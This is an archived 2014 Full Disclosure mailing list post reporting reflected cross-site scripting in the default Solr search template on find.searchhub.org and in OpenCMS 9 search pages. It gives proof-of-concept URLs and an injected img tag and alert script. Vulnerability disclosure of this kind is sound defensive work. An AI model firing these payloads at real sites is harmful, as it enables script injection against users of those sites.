Full Disclosure mailing list archives
XSS - find.searchhub.org, opencms version9 and others
From: jkmac () Safe-mail net
Date: Tue, 20 May 2014 16:23:37 -0400
Hello, the default search template for solr is prone for XSS, because nobody validated the input. PoC: http://find.searchhub.org/?q=%3Cimg+src%3D%27http%3A%2F%2Fc.s-microsoft.com%2Fnl-nl%2FCMSImages%2Fmslogo.png%3Fversion%3D856673f8-e6be-0476-6669-d5bf2300391d%27%3E http://find.searchhub.org/?q=%3Cscript%3Ealert%28%27foo%27%29%3C%2Fscript%3E This is also valid for any opencms website that uses the solr search, e.g. the default opencms search template based on solr in opencms version 9. E.g. point your browser to http://localhost:8080/opencms/opencms/demo/search-page/ and search for <img src='http://c.s-microsoft.com/nl-nl/CMSImages/mslogo.png?version=856673f8-e6be-0476-6669-d5bf2300391d'> That might not be a solr issue, but an implementation one. Regards. _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- XSS - find.searchhub.org, opencms version9 and others jkmac (May 20)